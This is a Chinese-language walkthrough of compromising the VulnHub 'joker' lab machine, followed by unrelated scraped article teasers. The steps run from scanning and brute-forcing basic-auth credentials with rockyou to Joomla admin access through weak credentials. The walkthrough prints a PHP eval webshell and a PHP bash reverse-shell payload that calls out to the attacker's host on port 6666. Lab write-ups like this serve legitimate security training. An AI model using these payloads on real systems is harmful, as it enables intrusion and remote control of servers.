vulhub-joker攻略

ops/2025/3/19 10:36:26/

靶场下载链接

 https://download.vulnhub.com/ha/joker.zip

 将kali和joker,桥接模式

获取靶场ip

arp-scan -l

使用nmap扫描

nmap -sS -sV -p- 

 访问80端口什么都没有发现

访问8080端口发现

用drib进行目录扫描 

dirb "http://192.168.117.157" -X .txt,php,json,html

访问secret.txt发现

 登录

使用登录,进行抓包

Authorization:后面的是账号密码的base64形式

发送到攻击器 

打开kali自带字典,复制字典一部分,整个复制了最好

爆破时会用到

cd /usr/share/wordlists

sudo gzip -d /usr/share/wordlists/rockyou.txt.gz 

cat rockyou.txt

新建一个a.txt将字典复制的放入 

爆破设置

2的时候从文件加载选择a.txt 

 

点击攻击后得到密码 

解码base64

成功登录 

 账号密码弱口令登录,尝试用joomla

点击Site Administrator

因为刚才的弱口令登录成功,所以这个的账号密码都是joomla

 进去后点击Templates

 木马

 选择一个文件编辑

 创建一个新文件编辑,写入一句话木马

 点击左上角保存

<?php @eval($_POST["cmd"]);?>

 蚁剑连接成功

反弹shell

再建立一个a.php

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.117.157/6666 0>&1'");?>

使用kali开启对6666端口的监听 

 

 访问http://192.168.117.157:8080/templates/beez3/html/a.php

 kali收到监听消息,反弹shell结束


http://www.ppmy.cn/ops/167002.html

相关文章

企业安全——密码学基础

0x00 前言 密码学的内容一直都是零零散散的&#xff0c;学一遍忘一遍&#xff0c;对于这些很少用到的内容&#xff0c;只能这样子去进行重复&#xff0c;效率低从此没有效率会稍微好一点。 总会比说出base64是一种加密方式贻笑大方的好一点。 0x01 密码学的目的 密码学的主要…

C++11 详解版本1.0

目录 &#x1f31f;1. C11的大优势 &#x1f31f;2、列表初始化 &#x1f31f;3、变量类型推导 一、为什么需要类型推导 二、decltype类型推导&#xff08;了解&#xff09; &#x1f31f;4、final 与 override &#x1f31f;5. 左值和右值 &#x1f31f;6. 左值引…

高项第十二章——项目质量管理

项目质量管理包括把组织的质量政策应用于规划、管理、控制项目和产品质量要求&#xff0c;以满足干系人目标的各个过程。 项目质量管理针对的是项目过程中所涉及的活动 可交付成果质量管理针对的是项目生产的具体可交付成果&#xff0c;与可交付成果的性质和特性紧密相关 12…

【自学笔记】MongoDB基础知识点总览-持续更新

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 MongoDB基础知识点总览目录1. MongoDB简介示例代码&#xff1a;连接MongoDB 2. 安装与配置安装MongoDB配置MongoDB 3. 基本概念示例代码&#xff1a;创建数据库和集…

C++之list类及模拟实现

目录 list的介绍 list的模拟实现 定义节点 有关遍历的重载运算符 list的操作实现 &#xff08;1&#xff09;构造函数 (2)拷贝构造函数 &#xff08;3&#xff09;赋值运算符重载函数 &#xff08;4&#xff09;析构函数和clear成员函数 &#xff08;5&#xff09;尾…

从C语言开始的C++编程生活(1)

前言 本系列文章承接C语言的学习&#xff0c;需要有C语言的基础才能学会哦。 第1篇主要讲的是有关于C的命名空间、输入和输出。 C才起步&#xff0c;都很简单呢&#xff01; 目录 前言 命名空间namespace 基本语法 作用 使用命名空间 域作用限定符 :: 基本语法 using n…

【错误解决】ollama使用huggingface拉取模型异常

ollama使用huggingface拉取模型异常 方法1 替换镜像网址&#xff0c;将hf.co替换为hf-mirror.com 如&#xff1a; ollama run hf.co/Polaris614/fortunetelling替换为&#xff1a; ollama run hf-mirror.com/Polaris614/fortunetelling方法2 开全局代理

第29周 面试题精讲(4)

Java面试题详解 一、简单工厂和工厂方法到底有哪些不同&#xff1f; 问题&#xff1a;简单工厂和工厂方法有哪些区别&#xff1f; 答案&#xff1a; 简单工厂&#xff1a; 通过一个工厂类实现对象创建&#xff0c;隐藏创建细节。所有对象创建基于一个方法&#xff0c;通过参…